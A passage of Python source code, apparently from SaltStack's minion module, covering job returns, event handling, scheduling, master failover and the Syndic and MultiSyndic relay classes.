ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if data['fun'][ind] != 'saltutil.refresh_pillar' and \
data['fun'][ind] not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning('Cannot run startup_states when \'master_type\' is '
'set to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.')
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Minion of "{0}" is handling event tag \'{1}\''.format(self.opts['master'], tag))
if tag.startswith('module_refresh'):
self.module_refresh(notify=data.get('notify', False))
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith('__master_disconnected') or tag.startswith('__master_failback'):
# if the master disconnect event is for a different master, raise an exception
if tag.startswith('__master_disconnected') and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith('__master_failback'):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True)
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name='__master_failback',
schedule=schedule)
else:
self.schedule.delete_job(name='__master_failback', persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive_{0}'.format(self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
if hasattr(self, 'schedule'):
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace('Broadcast message received not for this minion, Load: {0}'.format(payload['load']))
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: {0}'.format(args[1]))
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# Syndic Tune In
@tornado.gen.coroutine
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
log.debug('Syndic \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local.event.set_event_handler(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['data']['jid'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
@tornado.gen.coroutine
def _return_pub_multi(self, values):
for value in values:
yield self._return_pub(value,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._fire_master(events=events,
pretag=tagify(self.opts['id'], base='syndic'),
sync=False)
if self.jids and (self.pub_future is None or self.pub_future.done()):
values = self.jids.values()
self.jids = {}
self.pub_future = self._return_pub_multi(values)
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
for master in self.opts['master']:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
